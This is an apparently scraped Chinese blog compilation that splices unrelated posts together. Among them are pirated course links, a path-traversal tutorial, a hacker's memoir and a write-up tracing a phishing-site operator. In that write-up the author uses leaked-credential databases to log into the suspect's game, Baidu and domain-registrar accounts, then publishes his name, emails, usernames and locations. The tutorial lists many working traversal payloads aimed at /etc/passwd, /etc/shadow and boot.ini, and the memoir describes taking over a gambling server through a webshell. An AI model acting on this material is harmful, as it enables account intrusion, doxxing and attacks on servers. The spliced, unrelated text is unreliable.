宋奇鸿老师的奇门普惠班录音，主要教的是奇门的六亲断，据课上录音说学完四节课就能断事，准确率100%，但是只能断一件事的成败。
高级版录音谁有可以分享一下，还有今年微信开班的录音谁能搞到也共享一下！

请自行保存，挂了不补，谢谢

链接: https://pan.baidu.com/s/1jH6j1Pk 密码: 943e

[caption id="attachment_2498" align="alignnone" width="1016"] 免费使用国外手机收验证[/caption][caption id="attachment_2499" align="alignnone" width="1141"] 免费使用国外手机收验证[/caption]
请自行保存！
链接：http://pan.baidu.com/s/1i5oPZYd 密码：jivy

有粉丝在群里面反馈说自己可能遇到了诈骗站 让我给帮忙看看 

如下所示

本以为就是普通的广告

但是打开后是这样的

里面的汤累是他写上去的 

浏览器打开研究一些

如下

我们填写一个进去  随便写一个手机号进去看看

没有任何验证  （目的是收集个人手机号个名字 然后病毒式传播让别人也参与进来）

好了 既然知道是诈骗网站了我们先看看网站结构

http://o3e0.3dprinthome.cn/wx.qq.com/plugin.php?id=tom_kanjia&mod=index&kid=1&uid=816346 

当前砍价链接是这个  通过修改最后的id可以看到别人砍价情况  通过id计算上当人数已经到了捌拾壹万陆仟叁佰多

一级一级的条目了发现这个站是dz的

http://o3e0.3dprinthome.cn/wx.qq.com/forum.php?mod=forumdisplay&fid=2

里面的帖子都是办假证的诈骗广告

通过测试发现  钓鱼用的页面是一个dz的插件 利用dz插件钓鱼的 

plugin.php?id=tom_kanjia 就是这个  名为tom_kanjia  砍价的插件

我们百度搜索一下

在dz官网插件社区可以找到这个插件  售价260 

安装量超过了25.2万 一个随随便便的垃圾网站都能骗取80多万用户数据  别的就跟不用说了 

测试了几次都没拿到网站权限（本人菜鸡一枚大牛莫喷）

既然拿不下权限 看下旁站 结果用了cdn 根本没找到真实ip

突然想到注册用户发送邮件可以找到真实地址 跑去注册了一个账户 

发现根本不会发信  没有邮箱验证机制

那就只能社工了

有了名字  邮箱 还有域名注册商 新网

看了下他注册这几个站都是用来收集个人信息的 

3dprintmall.cn

3dprinthome.com.cn

3dprintcenter.cn

o3e0.3dprinthome.cn

47.91.128.243美国,加利福尼亚州,圣克拉拉 (阿里云)（这个是CDN服务器）

先拿邮箱搜索一下社工库

得到一个常用密码  ai******n

常用用户名happykevin  hurricanekevin  

在久游网找到常用注册ip地址一枚在北京 

盛大游戏登录成功

收集绑定的是我自己的  不然好久没登陆必须要绑定手机才能登陆 

盛大还绑定了身份证号  就是防成谜 但是没找到绑定身份证是什么  然后就这样了  没有啥情况

爱拍游戏账号登陆成功  得到qq号一枚

从qq号看到他有一个微信公众号  ------好奇的我

.

主题是个人  我们看一下资料

如果没猜错这些东西都是他的  名字应该就是淘宝权（不是lol那个淘宝全QAQ）

黑龙江人 继续那qq来搜索百度 没找到东西 我们用qq搜索贴吧

搜到两个百度账户

微信他没加我 名称还是淘宝  也就补贴图了 

看得出喜欢打羽毛球

从发的帖子也没找到啥有用的东西来  只能确定另一个昵称 jlwfr640

现在我们可以利用百度的密码找回功能  hurricanekevin找回这个id的密码试试

绑定邮箱虽然他做了这样处理 但是我们可以大胆猜测一下  通过前面收集的信息来看 这个邮箱应该是taobaoquan@gmail.com  谷歌邮箱 

jlwfr640账号绑定的是taobaoqua@126.com 

我们继续用社工库搜索谷歌邮箱来看看

可以看得出我们猜对了  用户名也是常用的 

到了这里我们还是 用常用用户名搜索社工库

然而搜索出来一大堆  但是并没有什么卵用

继续qq看空间 

不知是他照片否 反正是头像 

通过邮箱查支付宝

支付宝绑定的就是陶宝权

绕来绕去绕糊涂了 都还没证明那个站是不是他的  我们继续 想其他办法 

前面讲到 我们查域名的时候查到他域名是在新网买的  我们去新网看看 

啥也别说了 直接登陆进去 

我的产品可以看到他的域名 

域名实名管理都是他的

域名订单

买域名的时候人在北京 用的中国工商的卡

本来想着找到真实ip在渗透试试结果新网这边也看不到真实解析ip  都是cdn

3月16号在广东

3月19号在河南  

到了这里差不多要结束本次社工了  可以确定就是这个人在操作

可能有人要问为什么这么确定这个是钓鱼网站 

那么你可以在下方留言或者 提问 我来给你接到 也可以在后台问我要砍价插件代码 你可以自己拿回去研究

对了 忘记说了 他的天涯账户登录的时候提示必须再次修改密码才能登陆成功 但是并没有成功进入邮箱 （太失败 ）然后就在他天涯发布的帖子找到一篇文章给大家看看

他说他空虚寂寞冷

                                                     然而你还是堕落了

还是那句话

苦海无涯

回头是岸

一个个人证人可以领3个月，
企业认证可以领6个月。

我领的是个人认证。

这个活动地址：https://www.xunyun.com/yearact_new

提醒

如果你没什么用的话还是不要申请，毕竟泄露个人信息的可能性有大了。看看需要哪些资料吧。

[callout class="info" title=""]本文只是教大家能正确认识到这种骗术，而不是教你们如何去操作，请大家不要去触碰法律的界限。[/callout]本文与大家分享的是，倒卖银hang/卡的黑色项目，日赚数十万。网赚者网站分享本文的目的旨在揭露其中的套路，揭露不法分子的骗术，防止大家上当受骗。请大家认真识别，更不要操作。
做互联网的朋友，经常提及灰色项目、黑色项目。不管是黑色还是灰色终归是见不得光的，因此，不少人开始思考如何降低风险或者转移风险，其中最好的方法就是利用别人的银hang/卡收款，将风险转移。
去哪里找到银hang/卡是个问题，很多人开始搜索百度、搜索QQ群，一切方法都能被利用上，如下图所示：
在各种QQ群里面，你也可以看到买卖银hang/卡的各种广告信息：
所有卖银hang/卡的，几乎都支持到付或者担保交易。每套价格差不多一千元左右，包括#敏感词#、银hang/卡、U顿、电话卡、开户资料等，资料配备齐全，价格低到怀疑人生。
那么这些人真的是依靠卖卡赚钱吗？
毫无疑问不是的，卖卡仅仅是一个幌子，重点是黑吃黑。
这些人抱着你买卡肯定是洗黑钱的心态，等你钱进卡的时候分分钟把你黑走，吃准你不敢把他怎样。有朋友或许会想到拿到卡后把账号密码所有都修改了，看他怎么黑，所谓道高一尺，魔高一丈。
这里给大家简单说下黑你的方式，如开通“归集功能”、开通二级账户。所谓“归集”是指当你某一张银hang/卡达到设定的资金数额时，银行系统会自动将该卡的资金归集到另一个你设定的账户上，你卡进多少就归集多少。
或许，有朋友还会想每次只转一点钱，然后一点点的把钱取出来。这也是不可行的，因为卖给你的卡是二级账户，一级账户可以设置你的取款或者转账额度，额度最低可以设置为零，也就是你一分钱都取不到，进多少黑多少。
这些专业玩黑吃黑的，你所想到的他都可以想到。为何突然写这篇文章，是因为前天一位徒弟告知小编被黑，被黑的方式就是上文讲述的，被黑金额达2W。
因此，今天就专门写一篇文章来揭露一下这隐藏的很深的套路，希望大家可以识别，切莫被坑。这里再一次强调，创作本文的目的仅是揭露骗局，明确反对买卖银hang/卡或#敏感词#资料行为。

阿里云回馈会员：人人免费抽奖三次 活动规则：新老会员不限 通过实名认证会员人人可参与 活动期间（2016.12.09-2017.03.31）一个账号仅限抽奖三次 活动地址：https://m.aliyun.com/markets/aliyun/yiyuan2_copy

免费评分

[callout class="info" title=""]现代项目的开发，需要掌握多种技术。互联网项目，需要用到后端开发、前端开发、界面设计、产品设计、数据库、各种移动客户端、三屏兼容、restFul API设计和OAuth等等，比较前卫的项目，还会用到Single Page Application、Web Socket、HTML5/CSS3这些技术以及像第三方开发像微信公众号微博应用等等。[/callout]

[tinr2v]
解压密码：www.eenot.com
[/tinr2v]

视频截图

课程目录：

课时1 1 C++程序设计概述 34:54
课时2 2.1 C++的数据类型1 31:21
课时3 2.2 C++的数据类型2 16:45
课时4 2.3 C++的运算符 45:42
课时5 3.1 C++数据的输入与输出 41:13
课时6 3.2 C++的流程结构概述 17:36
课时7 3.3 if选择结构应用 10:23
课时8 3.4 switch选择结构 31:19
课时9 3.5 循环结构概述 27:34
课时10 3.6 循环结构应用实例1 14:05
课时11 3.7 循环结构应用实例2 07:50
课时12 3.8 循环结构应用实例3 12:20
课时13 3.9 循环结构应用实例4 09:44
课时14 4.1 函数的定义 试看 19:24
课时15 4.2 函数的嵌套调用 22:08
课时16 4.3 函数的递归调用 11:25
课时17 4.4 内置函数 06:07
课时18 4.5 函数的重载 06:14
课时19 4.6 函数模板 11:18
课时20 4.7 有默认参数的函数 13:18
课时21 4.8 变量的作用域 03:44
课时22 4.9 变量的存储类别 13:52
课时23 5.1 一维数组的定义与引用 试看 41:44
课时24 5.2 二维数组的定义与引用 20:14
课时25 5.3 一维数组名作实参 26:13
课时26 5.4 二维数组名作实参 10:00
课时27 5.5 字符数组操作 36:33
课时28 5.6 字符串类string 06:57
课时29 5.7 string应用举例 15:40
课时30 6.1 指针变量的定义 17:24
课时31 6.2 指针变量的应用 19:34
课时32 6.3 指针与一维数组 21:22
课时33 6.4 指针与二维数组 15:33
课时34 6.5 函数指针变量 18:04
课时35 6.6 指针数组与指向指针的指针 15:26
课时36 6.7 const 指针 22:19
课时37 6.8 引用 11:54
课时38 7.1 结构体变量的定义 试看 22:58
课时39 7.2 结构体变量应用举例 13:49
课时40 7.3 结构体构成单链表 22:37
课时41 7.4 结构体元素作为参数传递 15:23
课时42 7.5 动态存储分配 19:02
课时43 7.6 共用体 11:24
课时44 7.7 枚举型的定义与应用 30:38
课时45 8.1 类和对象概述 42:05
课时46 8.2 类和对象分析 试看 19:45
课时47 8.3 类和对象应用举例 10:45
课时48 9.1 构造函数的定义 14:19
课时49 9.2 带参数的构造函数 11:19
课时50 9.3 析构函数的定义与应用 11:45
课时51 9.4 对象的赋值与复制 30:10
课时52 9.5 静态成员 37:33
课时53 9.6 友元 27:03
课时54 9.7 类模板的创建与应用 17:33
课时55 9.8 类和对象应用举例 33:54
课时56 10.1 运算符重载的定义与应用 试看 27:32
课时57 10.2 友元运算符重载 06:59
课时58 10.3 重载双目运算符 15:00
课时59 10.4 重载单目运算符 29:56
课时60 10.5 输入输出流的重载 25:50
课时61 11.1 继承与派生的定义 试看 26:28
课时62 11.2 派生类的构造函数与析构函数 12:29
课时63 11.3 有子对象的派生类构造函数 11:08
课时64 11.4 多层派生时的构造函数 12:38
课时65 11.5 多重继承产生的二义性 28:33
课时66 11.6 虚基类的应用 24:16
课时67 12.1 多态的引出 试看 17:47
课时68 12.2 虚析构函数 21:57
课时69 12.3 纯虚函数与抽象类经典案例1 24:22
课时70 12.4 纯虚函数与抽象类经典案例2 45:38
课时71 13.1 标准输入输出流 试看 31:40
课时72 13.2 对ASCII文件的输出操作 26:17
课时73 13.3 对ASCII文件的读取操作 14:08
课时74 13.4 对ASCII文件的操作实例 25:13
课时75 13.5 对二进制文件的读取操作 21:07
课时76 14.1 异常的定义与应用 试看 28:04
课时77 14.2 在函数嵌套的情况下使用异常处理 19:04
课时78 14.3 在异常处理中处理析构函数 21:17
课时79 14.4 命名空间 14:21

[tinl2v]
解压密码：
www.eenot.com
[/tinl2v]

这些年，互联网爆炸式的发展，促生了无数程序员。
也促生了达内，黑马，极客学院等大量 IT培训机构。
短短数年间，科班出生的程序员和培训机构出生的程序员呈指数增长。
程序员的职业也不再是金饭碗。写了这么多代码，有些感触，所以写下来。

0x00关于语言

从汇编到C语言，再从VB到C++，后来Java 、js……,越来越多的语言被创造出来，渐渐的出现一个奇怪的现象，程序员语言鄙视链。其实所谓的鄙视链往往也就是因为各种语言的性能以及难易度造成的。
按照我现在的经验，往往越高级的语言，越容易阅读，可性能也比不过C语言这种中层语言。因为一系列的检查机制和代码编译造成了一些性能浪费。

我觉得语言其实不分好坏，各种语言都各自的优点和缺点，Java适合用来做Web，因为早期的跨平台加上多年积淀，已经让Java EE发展到现在，无数的框架模板各种企业级商业解决方案，Swift在iOS上独领风骚。Python在爬虫等行业上发展壮大。

有些人喜欢拿语言缺点说事，我觉得吧，这种人应该自己写一套语言，看看他写的语言能不能既像自然语言一样好理解，还能完美利用内存，性能堪比汇编。
说PHP是世界上最好的语言只是一句玩笑话，几乎有点编程经验的都知道。世界上没有最好的语言，只有最合适的语言。如果你非要分好坏，我表示不争论这个，我且尊重你的观点。

0x01关于经验主义

很多刚毕业的或者刚培训出来的学生，在找工作的时候喜欢批评HR，没经验怎么了，你们不也是从没经验过来的吗？凭什么招聘非要3年经验的。应届生不是人吗？

HR招人只是为工作，经验足的上手快，基本认的是这个理。不是HR错了，也不是没经验错了，这个矛盾至始至终没有什么好的解决办法。
大家都是从没经验过来的，如果幸运的被大公司找去当实习生出来也不愁经验的问题。所以吐槽3年经验，还不如让自己多接触点实际项目，哪怕是抄开源的东西，只要你做出来了，也是极好的，分分钟上手一个项目，哪家公司会不想要，除非雇不起。

在编程这一行，天赋跟经验都很重要。比如从来没有人跟你说过泛型，也没有见过搭建框架来完成项目，那么在你写业务的时候，你可能自己封装了一个类，直接就上了。
但是如果你看过别人用了这个方式，你肯定会觉得自己写的不如人家，以后会学习别人。
这就是经验积累。这种积累无可替代，都是自己摸索。

但是这种经验有时候也挺害人的，比如某个语言出来一个新的特性，因为没用过，奉行经验主义会让你避免使用这个新的更高效的功能。
因为你认为传统的东西更可靠，更安全，殊不知在正式推出新特性的时候，语言工程师无数的调试和修改，保证了稳定性才推出了正式的更新。
除开程序员，一些老爸老妈级的网民和政府机关现在还在用IE6，也是因为经验主义，觉得IE6一直用，很舒服，不喜欢换。
或者特定的软件必须用IE6，这款软件几万年没有更新了，除了IE6没有其他可兼容的浏览器能运行，也间接影响了各种机关办事效率。可能走办一个业务，走一个程序要等很久，很久。我是真心希望这些机构能更新一下软件和硬件，毕竟我们国家的税收不低。

经验是用来避免已经犯过的错误，不是用来逃避技术更新说辞。双刃剑靠自己把握。

0x02 关于科班和培训生

我的观点是程序员不是按出生分的，有人这么分，是因为公司按这种分类给程序员不同的待遇，尤其是体制观念很深刻的公司。不得不说有的人潜意识里还是有《出生论》批判过的思维。

非要排个序的话，我是把能力排在第一的，而且我觉得程序员之间不要用科班生和培训生来分类，如果你觉得待遇不公平，上等的方式就是做的比他更好，然后跟老板要该有的待遇。
一个公司不能给有能力的员工符合能力的待遇，一般情况下员工会自己离开的。如果你不出众，却觉得：比你更差的人却比你待遇好，老板是不是傻，我要跳槽…… 之类的时候，很可能陷入一个恶性循环，自己能力一般，跳来跳去，最后既没有拿到自己想要的待遇，也没有提升自己的技术水平，这就尴尬了。

所以能力我是放在第一位的，能吸引老板的地方，必然是我会的比别人多，我学的比别人快……

当你觉得：我擦，凭什么大学好一点待遇就比我好那么多？或者：那个野鸡大学出来，进培训班出来的程序员凭啥对我吆五喝六的？的时候。我只能说：少年，你的思想很危险啊。

只要公司里不是像宫斗戏一样勾心斗角，作为技术人员还是把技术放在第一位的比较好。

你问如果勾心斗角怎么办，呵呵，you can you up,no can you leave! 毕竟人家厚黑也是他的能力。

0x03 关于非对口专业入行

如果你觉得自己上了假大学，找不到工作，想干程序员；或者，你觉得程序员看起来高大上，想干这一行；或者，你热爱编码……
如果你不是对口专业，还想入行的时候，培训机构是最佳选择，不过从零开始培训的培训机构看起来高大上，也要注意一定要上实践课，保证你找工作起码有2~3个熟透的中型工程
这样你找工作就轻而易举了，别还没上完就急着找工作，到时候工作发现技术不够用，痛苦的是你自己。

我是不鼓励语言基础在培训机构里学习的，那些个课程网上一搜一大堆，前面说的编程经验就是告诉你，要有做项目的能力
所以培训机构值钱的就是实战项目，这种实战项目越新，越有用，越老，越说明培训机构越out。
常见的已经OUT的实战项目如：学籍管理、进存销系统、电商购物车、坦克大战、贪吃蛇、2048……，因为这些东西老了，网上一搜一大堆。

报名培训机构的小伙伴要注意，最好多试听几节课，3~4节，也要看清所谓的学后付款是不是贷款交学费，贷款交学费的话，无论你学没学好，都会强制还贷款的。
还要小心打着招聘的幌子，骗你培训交学费的机构。这种灰色的东西，光凭平社会的正义感是很难消灭的，还是自己小心。

至于培训机构，不是报名费越高，资格越老，就越好的。我个人的评判的标准还是看培训机构的实战项目你能不能从网上搜到、新技术有没有在培训的课程里更新。

0x04 关于学习

怎么说呢，道理大家都知道，但是懒惰谁都难逃魔掌，看谁懒的少一点，或者更会懒一点。
懒得少一点：就是你比别人付出更多时间来学习，尽量多打鸡血，笨鸟先飞，勤能补拙！
更会懒一点：就是你有不一样的学习方法，学习五分钟，装逼两小时。效率比一般人好n^n倍！

0x05 关于顿悟

不知道顿悟这个标题合不合适，有时候看着新的技术，会突然一下感觉眼前一亮，原来能这样。或者看自己以前的代码，我擦那是什么shit，改着改着，自己技术就上来了。
有时候同事的东西或者github上的东西会让你觉得，好厉害的编码，我要用到自己的项目里
当遇到这种情况的时候，千万要抓住时机，重构自己的代码，或记下自己的领会，不然这种感觉失去了，可能你又要变得浑浑噩噩，可能以后再也找不回那种feel了。

嗯，这一条是写给我自己看的，因为我之前想到的，现在因为断线了，补不回来了，唉。

基本定义：

目录遍历(或路径遍历)是由于Web服务器或Web应用程序对用户输入文件名称的安全性验证不足而导致的一种安全漏洞，使得攻击者通过HTTP请求和利用一些特殊字符就可以绕过服务器的安全限制，访问任意受限的文件(可以是Web根目录以外的文件)，甚至执行系统命令。

发现路径遍历漏洞

路径遍历漏洞的发现，主要是对Web应用程序的文件读取交互的功能块，进行检测，面对这样的读取方式：

“http://www.nuanyue.com/test/downfile.jsp?filename=fan.pdf”

我们可以使用 “../”来作试探，比如提交Url：“getfile=/fan/fan/*53.pdf”，而系统在解析是“d://site/test/pdf/fan/fan/../../*53.pdf”，通过“../”跳转目录“/fan”，即“d://site/test/pdf/*53.pdf”，返回了读取文件的正常的页面。

路径遍历漏洞隐藏一般在文件读取或者展示图片功能块这样的通过参数提交上来的文件名，从这可以看出来过滤交互数据是完全有必要的。恶意攻击者当然后会利用对文件的读取权限进行跨越目录访问，比如访问一些受控制的文件，“../../../../../../../etc/passwd“或者”../../../../boot.ini“，当然现在部分网站都有类似Waf的防护设备，只要在数据中会有/etc /boot.ini等文件名出直接进行拦截。

遍历路径攻击变异

路径遍历漏洞是很常见的，在Web应用程序编写过程，会有意识的对传递过来的参数进行过滤或者直接删除，存在风险的过滤方式，一般可以采用如下方式进行突破：

以下是一些绕过的方法，当然在实际运行过程中，可以组合使用。

(1) 加密参数传递的数据；在Web应用程序对文件名进行加密之后再提交，比如：“downfile.jsp?filename= ZmFuLnBkZg- “，在参数filename用的是Base64加密，而攻击者要想绕过，只需简单的将文件名加密后再附加提交即可。所以说，采用一些有规律或者轻易能识别的加密方式，也是存在风险的。

(2) 编码绕过，尝试使用不同的编码转换进行过滤性的绕过，比如Url编码，通过对参数进行Url编码提交，“downfile.jsp?filename= %66%61%6E%2E%70%64%66“来绕过。

(3) 目录限定绕过；在有些Web应用程序是通过限定目录权限来分离的。当然这样的方法不值得可取的，攻击者可以通过某些特殊的符号“~“来绕过。形如这样的提交“downfile.jsp?filename=~/../boot”。能过这样一个符号，就可以直接跳转到硬盘目录下了。

(4) 绕过文件后缀过滤；一些Web应用程序在读取文件前，会对提交的文件后缀进行检测，攻击者可以在文件名后放一个空字节的编码，来绕过这样的文件类型的检查。例如：../../../../boot.ini%00.jpg，Web应用程序使用的Api会允许字符串中包含空字符，当实际获取文件名时，则由系统的Api会直接截短，而解析为“../../../../boot.ini”。在类Unix的系统中也可以使用Url编码的换行符，例如：../../../etc/passwd%0a.jpg如果文件系统在获取含有换行符的文件名，会截短为文件名。也可以尝试%20，例如: ../../../index.jsp%20

(5) 绕过来路验证。在一些Web应用程序中，会有对提交参数的来路进行判断的方法，而绕过的方法可以尝试通过在网站留言或者交互的地方提交Url再点击或者直接修改Http Referer即可，这主要是原因Http Referer是由客户端浏览器发送的，服务器是无法控制的，而将此变量当作一个值得信任源是错误的。

以下可能导致路径遍历一些特殊字符：

..

..\

../

%2e%2e%2f which translates to ../

%2e%2e/ which translates to ../

..%2f which translates to ../

%2e%2e%5c which translates to ..\

%c1%1c

%c0%9v

%c0%af

..%5c../

../../../../../../../../../../../../etc/hosts%00

../../../../../../../../../../../../etc/hosts

../../boot.ini

/../../../../../../../../%2A

../../../../../../../../../../../../etc/passwd%00

../../../../../../../../../../../../etc/passwd

../../../../../../../../../../../../etc/shadow%00

../../../../../../../../../../../../etc/shadow

/../../../../../../../../../../etc/passwd^^

/../../../../../../../../../../etc/shadow^^

/../../../../../../../../../../etc/passwd

/../../../../../../../../../../etc/shadow

/./././././././././././etc/passwd

/./././././././././././etc/shadow

\..\..\..\..\..\..\..\..\..\..\etc\passwd

\..\..\..\..\..\..\..\..\..\..\etc\shadow

..\..\..\..\..\..\..\..\..\..\etc\passwd

..\..\..\..\..\..\..\..\..\..\etc\shadow

/..\../..\../..\../..\../..\../..\../etc/passwd

/..\../..\../..\../..\../..\../..\../etc/shadow

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow

\..\..\..\..\..\..\..\..\..\..\etc\passwd%00

\..\..\..\..\..\..\..\..\..\..\etc\shadow%00

..\..\..\..\..\..\..\..\..\..\etc\passwd%00

..\..\..\..\..\..\..\..\..\..\etc\shadow%00

%0a/bin/cat%20/etc/passwd

%0a/bin/cat%20/etc/shadow

%00/etc/passwd%00

%00/etc/shadow%00

%00../../../../../../etc/passwd

%00../../../../../../etc/shadow

/../../../../../../../../../../../etc/passwd%00.jpg

/../../../../../../../../../../../etc/passwd%00.html

/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd

/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow

/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow

%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00

/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00

%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00

%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini

/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini

\\'/bin/cat%20/etc/passwd\\'

\\'/bin/cat%20/etc/shadow\\'

../../../../../../../../conf/server.xml

/../../../../../../../../bin/id|

C:/inetpub/wwwroot/global.asa

C:\inetpub\wwwroot\global.asa

C:/boot.ini

C:\boot.ini

../../../../../../../../../../../../localstart.asp%00

../../../../../../../../../../../../localstart.asp

../../../../../../../../../../../../boot.ini%00

../../../../../../../../../../../../boot.ini

/./././././././././././boot.ini

/../../../../../../../../../../../boot.ini%00

/../../../../../../../../../../../boot.ini

/..\../..\../..\../..\../..\../..\../boot.ini

/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini

\..\..\..\..\..\..\..\..\..\..\boot.ini

..\..\..\..\..\..\..\..\..\..\boot.ini%00

..\..\..\..\..\..\..\..\..\..\boot.ini

/../../../../../../../../../../../boot.ini%00.html

/../../../../../../../../../../../boot.ini%00.jpg

/.../.../.../.../.../

..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini

/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bo

防范遍历路径漏洞

在防范遍历路径漏洞的方法中，最有效的是权限的控制，谨慎的处理向文件系统API传递过来的参数路径。主要是因为大多数的目录或者文件权限均没有得到合理的配置，而Web应用程序对文件的读取大多依赖于系统本身的API，在参数传递的过程，如果没有得严谨的控制，则会出现越权现象的出现。在这种情况下，Web应用程序可以采取以下防御方法，最好是组合使用。

(1) 数据净化，对网站用户提交过来的文件名进行硬编码或者统一编码，对文件后缀进行白名单控制，对包含了恶意的符号或者空字节进行拒绝。

(2) Web应用程序可以使用chrooted环境访问包含被访问文件的目录，或者使用绝对路径+参数来控制访问目录，使其即使是越权或者跨越目录也是在指定的目录下。

路径遍历漏洞允许恶意攻击者突破Web应用程序的安全控制，直接访问攻击者想要的敏感数据 ，包括配置文件、日志、源代码等，配合其它漏洞的综合利用，攻击者可以轻易的获取更高的权限，并且这样的漏洞在发掘上也是很容易的，只要对Web应用程序的读写功能块直接手工检测，通过返回的页面内容来判断，是很直观的。

当你获得一份webshell后，你会干嘛？

我曾获得N多webshell。什么discuz、dedecms、phpwind、phpweb、aspcms等等，甚至还包括N多自己研发的线上平台。

可是，问题来了，那么我能干嘛呢？

很多人对“hacker”的理解就是：攻破某某大型平台、攻破XX计算机，黑首页、格盘、数据泄露、等等，想想就可怕

当一家公司的数据出现在网络交易市场，这家公司会不会面临破产的风险？当某某计算机被攻破，会不会出现艳照门？或者网银被盗？

那么这些，就仅仅取决于攻击者的素质了。

很久以前，有一位网友给我发了一个网站，说自己在网上博彩被骗了。给我带了一个网址

当我打开这个网址，瞬间知道了这个网站的一些情况，站长是一位90后大学生，依靠博彩平台赚钱。

通过社会工程学信息收集得知，这个人依靠这个博彩平台撑起其家庭与学业，至于说具体细节，我不多说。

当时，我对这个博彩平台挺有兴趣的。于是抱着尝试的心态做了一些常规的安全测试

一周左右的时间，我的xssapp平台收到一封邮件，事实证明我成功获得后台权限。

可是，那时候我通过社会工程学早已了解到这名大学生的具体情况，我真的可以对他的网站进行破坏么

答案是否定的。

其实网络世界就是一个大自然，大自然有自己的规律，适者生存法则永远存在。

我删掉了xss的信封，但是好奇心让我进了人家的后台，我知道，这个博彩平台有很多水分。我抱着尝试的心态，获得了webshell。是net语言编写的程序。我成功获得了数据库、服务器权限。

我知道，这个网站是非法的，按照我历来的作风，碰到非法的网站，一定要加以处理。

格盘？摧毁系统？删掉数据库？ nonono。可是我什么都没做。因为站长的一些事迹感动了我。

我默默的退出了服务器。在D盘留下一个记事本，告诫站长，这样做事不对的。

一周之后，我发现那个网站还没有关闭，并且我的权限依旧还在。

揣摩了一下站长的心态，其实要删除我的后门，随便来个防火墙的扫描就行，然而我的权限依旧还在，那么、。。

这是一种信任，或者说站长本身也良心不安

我看到D盘站长给我留下的回复，我默默的想了半个多小时。

其实人之所图，到底是什么。

于是我留了一句话，如果站长半个月之内再不停止博彩业务，我将通过法律渠道揭发其非法罪行。

半个月过去了，站长的网站果然关了。

站长加了我的QQ。我们也经常聊聊人生。

我大概了解到，停止业务对站长的打击很大，几乎断了其资金来源。

那时候我很惭愧，因为站长家里的一些事情。我自愧不如。

大概一个月后，那名站长在网上开了一家网店，开始以为别人搭建官方网站为盈利途径。

事情就这样结束了。

记得很久以前，有一位网友问我。如果我能拿到那个权限。给我3W人民币。

可是，人民币真的重要么？

答案是必然的，人民币可以让我改变当前寄人篱下的现状。

但是有一点我做不到，我做不到问心无愧，我会惭愧一辈子。

问心无愧，懂么？

问题来了，当一名黑客获得你的webshell

他可以操作你的服务器，你的数据库，你的后台，你的一切给予web的文件。

甚至还能控制你的人生。

很多年前，我黑掉第一个网站，第二个网站

我在他们首页挂上我认为帅气的黑页

可是我发现，我并不高兴。并不乐观

我高兴的是，2011年的中菲黑客大战，我在人家网站挂上中国国旗

还有，2013年钓鱼岛事件。

然而，我错了，我大错特错，我以为

通过一些通杀漏洞挂上他国首页

我以为，这就是荣耀

可是，别国人民与我国一样，这真的是荣耀么？

不，这是丢人现眼。

然而，现在每年都会出现一些网络安全的后辈

走着我曾经走过的老路

当你挂上一个网站首页的时候

当你格式化人家磁盘的时候

当你删除人家数据库的时候

你的良心呢？

数据可视化工具
说到数据呈现，必然少不了可视化，分分钟将你的数据以更直观更闪亮的形式展现在用户面前。

Tableau：http://www.tableau.com/zh-cn
Infogr.am：https://infogr.am/
Easel.ly：https://www.easel.ly/
Color Brewer：http://colorbrewer2.org/
iCharts：http://www.icharts.in/
ChartBlocks：http://www.chartblocks.com/en/
Visual.ly：http://visual.ly/
Nuvi：http://www.nuvi.com/
Dygraphs：http://dygraphs.com/
百度ECharts：http://echarts.baidu.com/
Cytoscape：http://www.cytoscape.org
/图表秀：http://www.tubiaoxiu.com/
数据观：http://shujuguan.cn/
微博足迹可视化：http://vis.pku.edu.cn/weibova/weibogeo_footprint/index.html
BDP个人版：https://me.bdp.cn/home.html
xdatainsight：http://www.xdatainsight.com/portal/html/home.html
当然，excel你是绝对不能忽略的！
词云可视化工具
瞬间实现美观、酷炫的词云可视化。

Tagul：https://tagul.com/
Tagxedo：http://www.tagxedo.com/
Wordle：http://www.wordle.net/
WordItOut：http://worditout.com/
ToCloud：http://www.tocloud.com/
Rost：http://www.cncrk.com/downinfo/54638.html
图悦：http://www.picdata.cn/（国产软件）
语义分析系统：http://ictclas.nlpir.org/nlpir/
腾讯文智：http://nlp.qq.com/semantic.cgi
互联网趋势分析工具

百度指数：http://index.baidu.com/
好搜指数：http://index.so.com/#index
阿里指数：https://alizs.taobao.com/
艾瑞咨询：http://www.iresearch.com.cn/
友盟指数：http://www.umeng.com/
百度预测：http://trends.baidu.com/
微博指数：http://data.weibo.com/index
新浪微舆情：http://wyq.sina.com/login.shtml
在线调查工具

腾讯问卷调查：http://wj.qq.com/
麦客：http://www.mikecrm.com/
ICTR：http://cn2.ictr.cn/
问道网：http://www.askform.cn/
问卷星：http://www.sojump.com/
调查派：http://www.diaochapai.com/
问卷网：http://www.wenjuan.com/
SurveyMonkey：https://zh.surveymonkey.com/
网站分析监测工具
百度统计：http://tongji.baidu.com/web/welcome/login
站长工具：http://tool.chinaz.com/
CNZZ：http://www.cnzz.com/o_index.php?spm=0.0.0.0.kxHVXo
Alexa：http://www.alexa.com/
